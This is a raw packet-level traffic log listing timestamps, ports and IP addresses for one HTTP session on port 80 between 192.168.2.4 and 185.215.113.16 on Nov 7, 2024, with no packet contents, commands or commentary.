Nov 7, 2024 04:12:28.050657034 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050689936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050700903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050709963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050720930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050738096 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050741911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050764084 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050765038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050786972 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050789118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050801039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050810099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050812960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050831079 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050833941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050844908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050854921 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050857067 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050872087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050874949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050888062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050899029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050909996 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050910950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050929070 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050935030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050945997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050951004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050951004 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050960064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050983906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.050985098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.050997019 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051006079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051009893 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051017046 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051023006 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051028967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051039934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051059961 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051069021 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051073074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051089048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051095009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051100016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051105022 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051111937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051122904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051136017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051139116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051150084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051160097 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051160097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051173925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051179886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051184893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051203966 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051208019 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051225901 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051249981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051251888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051261902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051285982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051301003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051304102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051327944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051333904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051338911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051347017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051356077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051361084 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051367998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051384926 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051390886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051394939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051407099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051426888 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051438093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051450014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051455975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051474094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051477909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051489115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051498890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051501989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051511049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051522017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051554918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051570892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051583052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051592112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051610947 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051631927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051644087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051655054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051664114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051691055 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051693916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051704884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051717043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051733017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051737070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051748991 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051786900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051817894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051829100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051850080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051860094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051862955 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051872015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051892042 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051894903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051911116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051911116 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051920891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051930904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051937103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051954031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051955938 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.051964998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051976919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051985025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.051987886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052006006 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052010059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052022934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052031994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052057028 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052083015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052102089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052145004 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052189112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052200079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052233934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052237034 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052244902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052284002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052309990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052320957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052354097 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052398920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052414894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052424908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052436113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052447081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052457094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052458048 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052472115 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052479982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052490950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052489042 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052503109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052508116 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052515030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052525043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052539110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052541971 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052561998 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052567959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052576065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052594900 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052606106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052615881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052634954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052644968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052655935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052665949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052670956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052683115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052689075 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052694082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052705050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052715063 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052716017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.052726030 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.052755117 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086144924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086158037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086168051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086179018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086189985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086204052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086213112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086244106 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086249113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086261034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086271048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086281061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086292982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086294889 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086304903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086313963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086317062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086329937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086340904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086344957 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086355925 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086359024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086381912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086390972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086402893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086411953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086414099 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086431026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086431026 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086442947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086460114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086482048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086489916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086494923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086520910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086546898 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086625099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086637020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086647987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086669922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086673021 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086688995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086697102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086702108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086716890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086729050 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086736917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086752892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086757898 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086765051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086776972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086788893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086791992 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086803913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086822987 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086834908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086846113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086846113 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086863995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086878061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086889029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086899996 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086900949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086915016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086924076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086930037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086935997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086940050 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086947918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086960077 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.086977959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086990118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.086996078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087002039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087013006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087028027 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087038994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087048054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087059975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087069988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087090969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087110043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087132931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087143898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087153912 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087177992 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087188005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087198019 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087208033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087214947 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087220907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087235928 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087255955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087265015 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087268114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087280035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087292910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087306023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087322950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087332964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087340117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087344885 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087373018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087373972 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087384939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087403059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087412119 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087419033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087433100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087439060 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087455034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087464094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087466955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087491989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087492943 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087500095 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087502956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087515116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087526083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087526083 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087538004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087548018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087565899 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087568998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087587118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087589025 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087609053 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087615013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087625980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087636948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087640047 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087657928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087661982 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087675095 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087676048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087688923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087697983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087702990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087708950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087722063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087721109 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087749958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087769032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087769032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087780952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087791920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087826014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.087954998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087971926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.087985039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.088016987 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.088066101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.088078022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.088094950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.088112116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.088113070 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.088124037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.088135004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.088136911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.088148117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.088157892 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.088177919 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.088196039 CET	80	49762	185.215.113.16	192.168.2.4
